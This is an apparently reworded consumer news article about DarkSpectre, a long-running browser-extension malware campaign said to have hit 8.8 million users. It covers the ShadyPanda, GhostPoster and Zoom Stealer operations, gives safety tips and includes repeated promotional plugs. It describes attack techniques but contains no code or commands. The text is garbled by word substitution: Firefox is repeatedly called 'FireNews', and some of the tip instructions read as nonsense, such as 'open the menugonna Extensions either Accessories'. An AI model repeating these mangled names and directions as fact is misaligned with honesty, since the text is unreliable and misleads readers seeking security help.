Browser extension malware infected 8.8 million users in DarkSpectre attack

Browser extensions promise convenience. Many offer simple tools such as new tab pages, translators or video help.

However, researchers discovered a long-running malware operation that abused that trust on a large scale. Koi Security analysts identified the threat while analyzing suspicious infrastructure linked to a campaign known as ShadyPanda. What started as an investigation quickly revealed something much bigger.

The group behind this is now known as DarkSpectre. According to Koi researchers, it infected more than 8.8 million users on Chrome, Edge and FireNews over seven years. This was not a smash and grab attack. It was slow, deliberate and very organized. Instead of introducing malicious code into the markets, the group played the long game.

Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.

MALICIOUS CHROME EXTENSIONS STOPPED STEALING CONFIDENTIAL DATA

One threat actor behind three major campaigns

At first, the activity seemed like separate threats. That changed once Koi analysts followed the infrastructure crumbs. Moving between domains linked to ShadyPanda, Koi researchers discovered shared systems that power multiple groups of extensions. That analysis confirmed that ShadyPanda, GhostPoster, and Zoom Stealer were not separate actors. They were a coordinated operation. Together, these campaigns targeted both everyday users and corporate environments.

shadypanda

This campaign focused on mass surveillance and affiliate fraud. Researchers estimate that it affected more than 4 million users, and some analysis suggests the total could reach 5.6 million as additional related extensions come online. In several cases, the extensions remained legitimate for more than five years before quietly turning malicious.

GhostPoster

This campaign used a clever trick. It hid malicious code inside image files to bypass security controls. It affected 1.05 million users.

zoom thief

This operation focused on corporate meeting data across more than 28 conference platforms. It affected 2.2 million users.

Different goals. Same operator.

How Koi Discovered DarkSpectre’s Hidden Network

The breakthrough came when Koi analysts examined two domains linked to ShadyPanda. Those domains powered legitimate extension features, such as weather widgets and new tab pages. They were not command servants. That was the trick. Those same clean domains appeared again and again in other extensions that silently connected to a completely different malicious infrastructure.

A domain generated extensions. Those extensions exposed new domains. Those domains were connected to even more extensions. Following that chain allowed Koi to discover over 100 connected extensions across multiple browser markets. Some expansions even reused infrastructure already noted in previous research. That overlay confirmed that DarkSpectre was operating on a nation-state scale.

How DarkSpectre stayed hidden for years

DarkSpectre succeeded by combining legitimate functionality with hidden malware. Users got what they expected. Meanwhile, the threat passed silently in the background.

Delayed activation fooled reviewers

Some extensions waited days before triggering malicious behavior. Others activated malware on only a small percentage of page loads. This made detection during market reviews extremely difficult.

Malicious code disguised as images

The group hid JavaScript inside PNG image files. The extension loaded its own logo, extracted the hidden code, and ran it silently.

No updates required

Instead of pushing new extension versions, DarkSpectre controlled everything from its servers. Traders could change behavior at any time without alerting users or the markets. Koi researchers noted that this approach gave attackers long-term flexibility and control.

Why the Zoom Stealer campaign stands out

Most malware focuses on consumer fraud. Zoom Stealer focused on intelligence.

According to Koi analysts, these extensions included the following:

• Meeting links with built-in passwords
• Meeting IDs, topics and times
• Names, titles, biographies and photographs of speakers.
• Company affiliations and brands

Worse still, the data was transmitted in real time. The moment a user joined or viewed a meeting, information flowed. This type of data enables phishing and corporate espionage at scale.

Why browser extensions are still a weak link

Extension marketplaces typically evaluate code only at submission or update time. Koi’s research shows how attackers exploit that model. Once an extension earns trust badges and positive reviews, users stop questioning it. That confidence becomes a weapon. A clean extension today can become a threat tomorrow.

Ways to stay safe from malicious browser extensions

You don’t need to avoid extensions completely. You must be careful.

1) Keep your browser updated

Make sure you turn on automatic updates for your browser (e.g. Chrome, FireNews, Edge) so you’re always running the latest version without thinking about it.

2) Check your installed extensions

Eliminate everything you no longer use. Fewer extensions reduce risk. CyberGuy has step-by-step guides that show you how to safely check and remove browser extensions, making it easy to clean up your browser in just a few minutes. In Chrome, Edge, and FireNews, open the menugonna Extensions either Accessoriesand eliminate anything you don’t use or trust.

3) Install extensions only from trusted sources

Official browser stores like the Chrome Web Store have rules and analytics to detect bad actors. They are not perfect, but they are still a better option compared to a random website on the internet. Extensions from unknown websites or third-party downloads are much more likely to hide malware or spyware.

FALSE AI CHAT RESULTS ARE SPREADING DANGEROUS MAC MALWARE

4) Have powerful antivirus software

Strong antivirus software can warn you before installing malicious software, such as incomplete browser extensions. It can also alert you to phishing emails and ransomware scams, helping you keep your personal information and digital assets safe.

The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.

5) Invest in personal data deletion services

If your personal data was exposed in this security incident, it is critical to act quickly to reduce the risk of identity theft and scams. A data removal service can help you remove all of this personal information from the Internet.

While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites.

It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.

Get a free scan to find out if your personal information is already available on the web: Cyberguy.com.

6) Be skeptical of extensions that request unnecessary access

Some extensions go overboard on purpose. A calculator tool that asks for your browsing history or a weather app that asks for your login details is a big red flag. Before installing, ask: “Does this permission match the work of the extension?” If the answer is no, do not install it. Be wary of broad permissions like “Read and change all your data on the websites you visit” unless clearly justified (e.g. a password manager). If an update suddenly adds new permission requests, find out why. It could mean that the extension has been sold or pirated.

7) Change your passwords and do it securely

If you’ve ever saved passwords in your browser (for example, through the browser’s built-in password manager or the “Save Password” prompt), those credentials could be at risk if a malicious extension is installed. These built-in managers store passwords locally or in your Google, Microsoft, or FireNews account, and a compromised browser can give criminals an entry.

This typically doesn’t apply to dedicated password manager extensions, which encrypt your data independently and don’t rely on browser storage. However, if you’re unsure whether an extension has been compromised, it’s always smart to update your master password and enable two-factor authentication.

For maximum security, change your most important passwords (email, banking, shopping, cloud services) from a different, secure device, such as your phone or another computer where the questionable extension was never installed. Avoid using the same browser that may have been exposed. Then, consider switching to a password manager to create and store unique, secure logins for the future.

Next, check to see if your email has been exposed in previous breaches. Our #1 password manager pick includes a built-in breach scanner. ado that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

10 SIMPLE CYBERSECURITY RESOLUTIONS FOR A SAFER 2026

8) Watch for behavioral changes

Subtle changes often appear before obvious damage occurs. Sudden redirects, new tabs that open on their own, unknown search results, pop-ups, slower browsing, or websites that ask you to log in again unexpectedly may indicate a malicious or compromised extension. Pay attention if ads appear where never before or if your browser settings change without your intervention.

Koi’s research shows how attackers rely on patience. Once an extension gains trust and remains silent for years, users stop seeing it. That makes small behavioral changes easy to overlook. If something feels wrong, don’t ignore it. Disable the extensions one by one to identify the culprit. If the problem disappears, remove that extension permanently.

When in doubt, trust your instincts. Browsers shouldn’t surprise you.

CLICK HERE TO DOWNLOAD THE News APP

Kurt’s Key Takeaways

DarkSpectre is a reminder that online threats are getting smarter and quieter. This was not a smash and grab attack. It developed slowly, over years, and was built on trust that most people never think twice about. Koi analysts connected the dots by tracking shared infrastructure between campaigns, but also warn that some dormant extensions may still be installed and trusted today. Browser extensions can be useful, but each additional add-on is another door into your browser. Paying attention, cleaning the house from time to time, and questioning what you install can make a real difference.

When was the last time you checked what your browser extensions actually do behind the scenes? Let us know by writing to us at Cyberguy.com.

Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.

Copyright 2025 CyberGuy.com. All rights reserved.